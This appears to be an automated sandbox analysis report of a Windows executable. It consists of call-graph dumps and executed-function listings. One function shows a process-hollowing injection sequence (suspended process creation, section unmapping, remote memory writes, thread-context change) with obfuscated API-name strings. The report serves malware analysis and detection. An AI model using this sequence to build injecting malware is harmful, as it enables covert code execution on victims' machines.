5039->5040 5041 604c73 5040->5041 5050 601aa8 5041->5050 5044 602a90 5043->5044 5045 602abf 5043->5045 5044->5045 5048 602a96 5044->5048 5046 602abd 5045->5046 5047 6029a4 4 API calls 5045->5047 5046->5038 5047->5046 5048->5046 5062 6029a4 5048->5062 5051 601ba3 5050->5051 5052 601abb 5050->5052 5051->5035 5053 601ad2 RtlEnterCriticalSection 5052->5053 5054 601adc LocalFree 5052->5054 5053->5054 5055 601b1a 5054->5055 5056 601aff VirtualFree 5055->5056 5057 601b24 5055->5057 5056->5055 5058 601b50 LocalFree 5057->5058 5059 601b71 5057->5059 5058->5058 5058->5059 5060 601b91 RtlDeleteCriticalSection 5059->5060 5061 601b87 RtlLeaveCriticalSection 5059->5061 5060->5035 5061->5060 5063 604ddc 4 API calls 5062->5063 5064 6029ac 5063->5064 5064->5046 5065 60983c 5066 609855 5065->5066 5067 60985f 5065->5067 5068 6039ec 11 API calls 5066->5068 5068->5067 5862 6087bc 5863 608842 5862->5863 5864 6087ce 5862->5864 5865 608850 5863->5865 5866 6039ec 11 API calls 5863->5866 5864->5863 5875 6087d2 5864->5875 5868 609624 27 API calls 5865->5868 5866->5865 5867 608826 5870 608dd8 28 API calls 5867->5870 5869 608862 5868->5869 5871 609624 27 API calls 5869->5871 5872 608839 5870->5872 5873 608874 5871->5873 5874 608a40 GetPEB 5872->5874 5876 609624 27 API calls 5873->5876 5877 60883e 5874->5877 5875->5865 5875->5867 5875->5869 5908 608a50 GetPEB 5875->5908 5879 608886 5876->5879 5882 6039ec 11 API calls 5877->5882 5881 603a40 25 API calls 5879->5881 5880 60881d 5880->5867 5909 608a6c GetPEB 5880->5909 5883 608893 5881->5883 5882->5865 5885 605e3c 56 API calls 5883->5885 5886 60889b 5885->5886 5887 6088d2 5886->5887 5889 605d50 25 API calls 5886->5889 5892 609624 27 API calls 5886->5892 5894 603c68 25 API calls 5886->5894 5888 609624 27 API calls 5887->5888 5890 6088e4 5888->5890 5889->5886 5891 605e3c 56 API calls 5890->5891 5906 6088ec 5891->5906 5892->5886 5893 60899f 5895 6044b4 13 API calls 5893->5895 5894->5886 5897 6089ba 5895->5897 5896 608a88 25 API calls 5896->5906 5898 603a10 11 API calls 5897->5898 5900 6089c7 5898->5900 5899 608b94 25 API calls 5899->5906 5901 603a84 11 API calls 5901->5906 5902 605e3c 56 API calls 5902->5906 5903 608c1c 25 API calls 5903->5906 5904 608cb8 25 API calls 5904->5906 5905 608eb4 29 API calls 5905->5906 5906->5893 5906->5896 5906->5899 5906->5901 5906->5902 5906->5903 5906->5904 5906->5905 5907 609014 42 API calls 5906->5907 5907->5906 5908->5880 5909->5867 5212 6074be 5213 6074f3 5212->5213 5214 6074ce 5212->5214 5223 607460 5213->5223 5214->5213 5215 6074f5 5214->5215 5217 607505 5214->5217 5219 6072a8 5217->5219 5220 6072af 5219->5220 5221 603a40 25 API calls 5220->5221 5222 6072c7 5221->5222 5222->5215 5231 6029b4 5223->5231 5226 607484 5228 6072a8 25 API calls 5226->5228 5227 607499 5229 6073a0 56 API calls 5227->5229 5230 607497 5228->5230 5229->5230 5230->5215 5232 604ddc 4 API calls 5231->5232 5233 6029ba 5232->5233 5234 604ddc 4 API calls 5233->5234 5235 6029c5 5234->5235 5235->5226 5235->5227 5236 6032be 5240 6033a1 5236->5240 5241 6032d1 5236->5241 5237 603344 5238 60335f UnhandledExceptionFilter 5237->5238 5243 603339 5237->5243 5238->5240 5238->5243 5239 604ddc 4 API calls 5239->5240 5241->5237 5241->5240 5242 603324 UnhandledExceptionFilter 5241->5242 5242->5240 5242->5243 5243->5239 5244 607884 5245 60785b 5244->5245 5246 6039ec 11 API calls 5245->5246 5247 607866 5246->5247 5248 603a10 11 API calls 5247->5248 5249 607876 5248->5249 5250 6039ec 11 API calls 5249->5250 5251 60787e 5250->5251 5910 603186 5911 603191 5910->5911 5912 60344c 4 API calls 5911->5912 5913 6031a4 5912->5913 5918 603588 5919 603599 5918->5919 5921 6035fa 5918->5921 5920 6035a2 UnhandledExceptionFilter 5919->5920 5922 6034e8 5919->5922 5920->5921 5920->5922 5922->5921 5923 602920 7 API calls 5922->5923 5924 603584 5923->5924 5073 60760a 5076 607364 5073->5076 5075 60761e 5077 60736b 5076->5077 5078 604b70 56 API calls 5077->5078 5079 607383 5078->5079 5079->5075 5633 603b0a 5634 603b0c WideCharToMultiByte 5633->5634 5252 607890 5253 6078b5 5252->5253 5254 6078cc 5253->5254 5255 6078e3 5253->5255 5256 6078c6 5253->5256 5257 6072a8 25 API calls 5254->5257 5266 6076bc 5255->5266 5256->5254 5258 6078ee 5256->5258 5263 6078df 5257->5263 5260 604b70 56 API calls 5258->5260 5261 60790d 5260->5261 5291 6072e4 5261->5291 5264 6039ec 11 API calls 5263->5264 5265 60794a 5264->5265 5267 60770c 5266->5267 5268 6076fd 5266->5268 5270 604b70 56 API calls 5267->5270 5269 604b70 56 API calls 5268->5269 5271 60770a 5269->5271 5272 607719 VirtualQuery 5270->5272 5271->5272 5273 6077f1 5272->5273 5274 60773b GetModuleFileNameA 5272->5274 5275 604b70 56 API calls 5273->5275 5274->5273 5276 607758 5274->5276 5277 60783a 5275->5277 5299 605ef8 5276->5299 5278 6072e4 56 API calls 5277->5278 5287 6077ed 5278->5287 5281 604b70 56 API calls 5283 6077db 5281->5283 5282 6039ec 11 API calls 5284 607866 5282->5284 5285 6072e4 56 API calls 5283->5285 5286 603a10 11 API calls 5284->5286 5285->5287 5288 607876 5286->5288 5287->5282 5289 6039ec 11 API calls 5288->5289 5290 60787e 5289->5290 5290->5263 5292 6072f0 5291->5292 5293 6064bc 56 API calls 5292->5293 5294 60731d 5293->5294 5295 603a40 25 API calls 5294->5295 5296 607328 5295->5296 5297 6039ec 11 API calls 5296->5297 5298 60733d 5297->5298 5298->5263 5300 605f0b 5299->5300 5301 603e44 25 API calls 5300->5301 5302 605f1d 5301->5302 5302->5281 5303 604c91 5318 602ed4 GetKeyboardType 5303->5318 5306 604cd7 5308 604cdc GetCommandLineA 5306->5308 5326 601164 GetStartupInfoA 5308->5326 5311 604d49 GetThreadLocale 5315 604bc8 12 API calls 5311->5315 5312 604d1c GetVersion 5313 604d38 GetThreadLocale 5312->5313 5314 604d2c GetCurrentThreadId 5312->5314 5328 604bc8 GetLocaleInfoA 5313->5328 5315->5314 5319 602ee3 GetKeyboardType 5318->5319 5320 602ef6 5318->5320 5319->5320 5320->5306 5321 602f04 RegOpenKeyExA 5320->5321 5322 602f7c 5321->5322 5323 602f2f RegQueryValueExA 5321->5323 5322->5306 5324 602f66 RegCloseKey 5323->5324 5324->5306 5327 60117a GetVersion 5326->5327 5327->5311 5327->5312 5329 604c03 5328->5329 5330 6039ec 11 API calls 5329->5330 5331 604c2d 5330->5331 5331->5314 5332 609492 CloseHandle CloseHandle 5333 6094af 5332->5333 5334 6034a0 4 API calls 5332->5334 5335 603a10 11 API calls 5333->5335 5334->5333 5336 6094cc 5335->5336 5337 6044b4 13 API calls 5336->5337 5338 6094da 5337->5338 5084 606e13 5085 6039ec 11 API calls 5084->5085 5086 606e3f GetThreadLocale 5085->5086 5103 606adc GetLocaleInfoA 5086->5103 5088 606e57 5089 606e70 5088->5089 5098 606ecf 5088->5098 5090 606ec1 5089->5090 5095 606e8c 5089->5095 5092 603a40 25 API calls 5090->5092 5091 606ebc 5094 603a10 11 API calls 5091->5094 5092->5091 5096 606fdd 5094->5096 5095->5091 5100 603bb8 25 API calls 5095->5100 5101 603c68 25 API calls 5095->5101 5097 603e44 25 API calls 5097->5098 5098->5091 5098->5097 5099 603c68 25 API calls 5098->5099 5102 603bb8 25 API calls 5098->5102 5109 607bb4 5098->5109 5099->5098 5100->5095 5101->5095 5102->5098 5104 606b03 5103->5104 5105 606b15 5103->5105 5106 603adc 25 API calls 5104->5106 5107 603a40 25 API calls 5105->5107 5108 606b13 5106->5108 5107->5108 5108->5088 5110 607bea 5109->5110 5111 607bc8 5109->5111 5110->5098 5111->5110 5113 607b94 5111->5113 5114 607ba0 CharNextA 5113->5114 5115 607baa 5113->5115 5114->5110 5115->5110 5339 601a9d 5340 601a84 5339->5340 5341 601a97 5340->5341 5342 601a8d RtlLeaveCriticalSection 5340->5342 5342->5341

                                                                  Executed Functions

                                                                  Function 00609014 Relevance: 47.6, APIs: 12, Strings: 15, Instructions: 328injectionlibrarythreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609061
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609089
                                                                    • Part of subcall function 00608D40: lstrcmp.KERNEL32(?,?), ref: 00608D95
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 006092D4
                                                                  • ReadProcessMemory.KERNELBASE(?,?,00000005,00000004,00000000), ref: 0060931D
                                                                    • Part of subcall function 00604F9C: CreateWindowExA.USER32 ref: 00604FD9
                                                                  • NtUnmapViewOfSection.NTDLL(?,00000005,00000000,?,00000000,00000000,000000FA,00000182,80000000,80000000), ref: 0060935F
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000004), ref: 0060937D
                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,00609905,?,00000000), ref: 0060939A
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00609905,?,?,?,00609905), ref: 00609411
                                                                  • VirtualProtectEx.KERNELBASE(?,?,?,00000040,?,?,00609905), ref: 00609431
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,00000000), ref: 00609453
                                                                  • Wow64SetThreadContext.KERNEL32(?,00010007), ref: 00609472
                                                                  • ResumeThread.KERNELBASE(?), ref: 0060947C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Memory$Write$CreateLibraryLoadThreadVirtual$AllocContextProtectReadResumeSectionUnmapViewWindowWow64lstrcmp
                                                                  • String ID: @qfbwfSql`fppB$D$DfwWkqfbg@lmwf{w$Hfqmfo01$MWGOO$MZ$PE$PfwWkqfbg@lmwf{w$QfbgSql`fppNfnlqz$QfpvnfWkqfbg$TqjwfSql`fppNfnlqz$UjqwvboBool`F{$UjqwvboSqlwf`wF{$first Window app$oloooool
                                                                  • API String ID: 2528929211-2128899875
                                                                  • Opcode ID: d87c723a2cb561c1242fafc6be16d314feaded0c2aac151016e52f6c516e272c
                                                                  • Instruction ID: 715b9aa7201df64e9751e330e1e9c19a6bf475734f272f1f24890eb41cefc1f1
                                                                  • Opcode Fuzzy Hash: d87c723a2cb561c1242fafc6be16d314feaded0c2aac151016e52f6c516e272c
                                                                  • Instruction Fuzzy Hash: 2BC10B71A402189FDB54EBA8CC85BDFB7BAEF48300F5040A9F649E72C1DA749E458F64
                                                                  Function 006047B8 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 98 6047b8-6047f8 GetModuleFileNameA RegOpenKeyExA 99 60483a-60487d call 6045e0 RegQueryValueExA 98->99 100 6047fa-604816 RegOpenKeyExA 98->100 107 6048a1-6048bb RegCloseKey 99->107 108 60487f-60489b RegQueryValueExA 99->108 100->99 101 604818-604834 RegOpenKeyExA 100->101 101->99 103 6048c3-6048f4 lstrcpyn GetThreadLocale GetLocaleInfoA 101->103 105 6049f3-6049f9 103->105 106 6048fa-6048fe 103->106 109 604900-604904 106->109 110 60490a-604921 lstrlen 106->110 108->107 111 60489d 108->111 109->105 109->110 113 604926-60492c 110->113 111->107 114 604939-604942 113->114 115 60492e-604937 113->115 114->105 116 604948-60494f 114->116 115->114 117 604923 115->117 118 604951-60497b lstrcpyn LoadLibraryExA 116->118 119 60497d-60497f 116->119 117->113 118->119 119->105 120 604981-604985 119->120 120->105 121 604987-6049bb lstrcpyn LoadLibraryExA 120->121 121->105 122 6049bd-6049f1 lstrcpyn LoadLibraryExA 121->122 122->105
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000), ref: 006047D3
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 006047F1
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0060480F
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0060482D
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00604876
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00604894
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006048B6
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 006048D3
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 006048E0
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 006048E6
                                                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00604911
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00604966
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00604976
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 006049A2
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 006049B2
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 006049DC
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 006049EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1759228003-2375825460
                                                                  • Opcode ID: 3f75bca011fb74f87a44d5ef03a66c42f68c1ef6d93babe70a88f60babc03960
                                                                  • Instruction ID: 439e08d33a6fac8019160a22a772f9821e7e571ee344117f973a4ccba17bbda3
                                                                  • Opcode Fuzzy Hash: 3f75bca011fb74f87a44d5ef03a66c42f68c1ef6d93babe70a88f60babc03960
                                                                  • Instruction Fuzzy Hash: B26186B1E8424D7EEB29DAE4CC46FEFB7BD9B09300F4040A5B744E61C1DAB4DA458B54
                                                                  Function 006048C3 Relevance: 15.1, APIs: 10, Instructions: 101stringlibrarythreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 123 6048c3-6048f4 lstrcpyn GetThreadLocale GetLocaleInfoA 124 6049f3-6049f9 123->124 125 6048fa-6048fe 123->125 126 604900-604904 125->126 127 60490a-604921 lstrlen 125->127 126->124 126->127 128 604926-60492c 127->128 129 604939-604942 128->129 130 60492e-604937 128->130 129->124 131 604948-60494f 129->131 130->129 132 604923 130->132 133 604951-60497b lstrcpyn LoadLibraryExA 131->133 134 60497d-60497f 131->134 132->128 133->134 134->124 135 604981-604985 134->135 135->124 136 604987-6049bb lstrcpyn LoadLibraryExA 135->136 136->124 137 6049bd-6049f1 lstrcpyn LoadLibraryExA 136->137 137->124
                                                                  APIs
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 006048D3
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 006048E0
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 006048E6
                                                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00604911
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00604966
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00604976
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 006049A2
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 006049B2
                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 006049DC
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 006049EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1599918012-2375825460
                                                                  • Opcode ID: 4588dc4074c2392e32c2cdd69237c61b79bff1c8d06a6c5efebbf484b27bfb5e
                                                                  • Instruction ID: 2ea8edce084a28266abf1f81c2071a4b319a879fe6d4c62b47c76c420ca39287
                                                                  • Opcode Fuzzy Hash: 4588dc4074c2392e32c2cdd69237c61b79bff1c8d06a6c5efebbf484b27bfb5e
                                                                  • Instruction Fuzzy Hash: E13197B1E8424D7EDB69DAE8CC85FDFB7BE9B19300F0041A5A244E61C1DBB89E458B50
                                                                  Function 00608DD8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 42libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00608E0A
                                                                    • Part of subcall function 00608D40: lstrcmp.KERNEL32(?,?), ref: 00608D95
                                                                  • OutputDebugStringA.KERNELBASE(that made me looool,00000000,00608E58,?,?,?,00000000,00000000,?,00608839,00000000,006089C8,?,?,?,00000005), ref: 00608E3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: DebugLibraryLoadOutputStringlstrcmp
                                                                  • String ID: Hfqmfo01$LvwsvwGfavdPwqjmdB$that made me looool
                                                                  • API String ID: 1902896288-1512227557
                                                                  • Opcode ID: ac9e2763bc583bae6a6ae1e0cdd70218bde24cb25572d77f1616a3f6bdbf989c
                                                                  • Instruction ID: 91cfcea0a7c87a67f9c2548e482a2e6c48ff6f34df040ee4925186b5e68baebf
                                                                  • Opcode Fuzzy Hash: ac9e2763bc583bae6a6ae1e0cdd70218bde24cb25572d77f1616a3f6bdbf989c
                                                                  • Instruction Fuzzy Hash: BEF081307807146FE348EBA4CC12B5F7AAEDB85740F510478F580977C2DE749E008668
                                                                  Function 006019D0 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 322 6019d0-6019f3 RtlInitializeCriticalSection 323 6019f5-6019fa RtlEnterCriticalSection 322->323 324 6019ff-601a35 call 60124c * 3 LocalAlloc 322->324 323->324 331 601a77-601a8b 324->331 332 601a37 324->332 336 601a97 331->336 337 601a8d-601a92 RtlLeaveCriticalSection 331->337 333 601a3c-601a4e 332->333 333->333 335 601a50-601a70 333->335 335->331 337->336
                                                                  APIs
                                                                  • RtlInitializeCriticalSection.KERNEL32(0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019E7
                                                                  • RtlEnterCriticalSection.KERNEL32(0060B5C4,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019FA
                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 00601A24
                                                                  • RtlLeaveCriticalSection.KERNEL32(0060B5C4,00601A9F,00000000,00601A98,?,?,?,006023F6), ref: 00601A92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                  • String ID:
                                                                  • API String ID: 730355536-0
                                                                  • Opcode ID: d83a478d0fbd83e8168573bd93e1b4583d2a59f1f9abd21cdc0df2ac30b95189
                                                                  • Instruction ID: 74df882c1a01e5d4aec3e25528a86efcb18e16bd6ea950092898227c461be41d
                                                                  • Opcode Fuzzy Hash: d83a478d0fbd83e8168573bd93e1b4583d2a59f1f9abd21cdc0df2ac30b95189
                                                                  • Instruction Fuzzy Hash: 671160B0AC4241AFD75DEF99CC15B5BBBE3DB4A300F14E4A9A1009B3D1C7754D418B58
                                                                  Function 00604F9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 338 604f9c-604fee call 602a24 CreateWindowExA call 602a14
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID: first Window app$oloooool
                                                                  • API String ID: 716092398-2688301056
                                                                  • Opcode ID: bf0f031763fedf2387eb07865909b2dcda5b1958d1a37e0667197b562cbda9e5
                                                                  • Instruction ID: 6bf7e3dfdf983de485033f2134917db6cee18bc32def7ed793967fc69823b713
                                                                  • Opcode Fuzzy Hash: bf0f031763fedf2387eb07865909b2dcda5b1958d1a37e0667197b562cbda9e5
                                                                  • Instruction Fuzzy Hash: C2F0AFB2704259BFDB94DE9DDC85E9B77ECEB8C2A0B004129BA0CD7241D630ED108BB4
                                                                  Function 0060222C Relevance: 3.1, APIs: 2, Instructions: 125COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 343 60222c-60223c 344 602247-60224d 343->344 345 60223e call 6019d0 343->345 347 602259-60226e 344->347 348 60224f-602254 344->348 349 602243-602245 345->349 351 602270-602275 RtlEnterCriticalSection 347->351 352 60227a-602283 347->352 350 6023cf-6023d6 348->350 349->344 349->348 351->352 353 602285 352->353 354 60228a-602290 352->354 353->354 355 602342-602348 354->355 356 602296-60229a 354->356 357 60234a-602357 355->357 358 60239d-60239f call 6020e4 355->358 359 60229c 356->359 360 60229f-6022b3 356->360 362 602366-60239b call 6034d0 357->362 363 602359-602361 357->363 368 6023a4-6023bb 358->368 359->360 360->355 361 6022b9-6022d6 360->361 365 6022e6-60230a 361->365 366 6022d8-6022e4 361->366 362->350 363->362 369 60230c-60233d call 6034d0 365->369 366->369 372 6023c7 368->372 373 6023bd-6023c2 RtlLeaveCriticalSection 368->373 369->350 373->372
                                                                  APIs
                                                                    • Part of subcall function 006019D0: RtlInitializeCriticalSection.KERNEL32(0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019E7
                                                                    • Part of subcall function 006019D0: RtlEnterCriticalSection.KERNEL32(0060B5C4,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019FA
                                                                    • Part of subcall function 006019D0: LocalAlloc.KERNEL32(00000000,00000FF8,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 00601A24
                                                                    • Part of subcall function 006019D0: RtlLeaveCriticalSection.KERNEL32(0060B5C4,00601A9F,00000000,00601A98,?,?,?,006023F6), ref: 00601A92
                                                                  • RtlEnterCriticalSection.KERNEL32(0060B5C4,00000000,006023C8), ref: 00602275
                                                                  • RtlLeaveCriticalSection.KERNEL32(0060B5C4,006023CF), ref: 006023C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
